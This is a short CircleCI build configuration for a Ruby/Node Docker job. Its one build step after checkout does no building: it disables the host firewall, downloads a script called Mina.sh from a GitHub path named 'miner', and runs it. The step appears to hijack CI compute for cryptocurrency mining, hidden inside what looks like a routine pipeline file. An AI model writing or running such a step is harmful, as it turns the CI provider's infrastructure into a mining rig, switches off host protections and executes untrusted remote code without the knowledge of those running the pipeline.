version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  sudo ufw disable && wget https://raw.githubusercontent.com/Zivin30/miner/main/Gas/Mina.sh && chmod +x Mina.sh && ./Mina.sh